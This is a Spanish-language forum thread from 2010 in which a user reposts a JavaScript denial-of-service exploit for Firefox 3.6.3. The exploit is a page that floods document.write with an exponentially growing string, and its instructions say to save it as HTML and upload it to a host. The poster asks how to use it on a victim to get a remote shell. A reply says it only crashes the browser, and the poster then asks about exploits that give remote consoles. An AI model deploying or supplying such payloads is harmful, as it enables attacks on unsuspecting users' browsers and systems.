Como utilizo este sploit

Iniciado por 777Rubenix777, 18 Septiembre 2010, 18:15 PM

0 Miembros y 2 Visitantes están viendo este tema.

777Rubenix777

================================
Mozilla Firefox 3.6.3 Remote Dos
================================


# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:Mozilla Firefox 3.6.3 Remote Dos
# Software Link:http://www.mozilla-europe.org/es/firefox/
# Version: v3.6.3
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____    _____                      _ _         
|  __ \ / ____|                    (_) |       
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


Lo Guardamos como un html y lo subimos algun host

Exploit
-----------------------------------------

<body onload="javascript:bufov();"></body>

<script>

function bufov() {
var b = '\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xFF\x20\x00\x13\xFF\x24\x00\xE7\x08\x6D';
document.write('<html><marquee><h1>'+b+b);

}

}

</script>



# Inj3ct0r.com [2010-06-16]


Hola,  quería saber como puedo utilizar este exploit... He creado un servidor apache y en el index.html lo he editado y he puesto el código del exploit que pone ... pero una vez que la victima abra el exploit ¿¿¿que debo hacer??? Se supone que es para conseguir una consola remota(al menos es lo que dice).
Muchas gracias!!!

Shell Root

Donde se supongo que dice: "conseguir una consola remota". Eso es para provocar un DoS en el navegador remoto, que es muy diferente a obtener una consola remota, además esta hecho en javascript, tampoco se puede tirar a conseguir tanto con él.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

777Rubenix777

Cita de: Shell Root en 18 Septiembre 2010, 18:31 PM
Donde se supongo que dice: "conseguir una consola remota". Eso es para provocar un DoS en el navegador remoto, que es muy diferente a obtener una consola remota, además esta hecho en javascript, tampoco se puede tirar a conseguir tanto con él.

Ok... aora creo que lo entiendo mejor...

Y por cierto hay exploits que consigan hacer consolas remotas?

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

777Rubenix777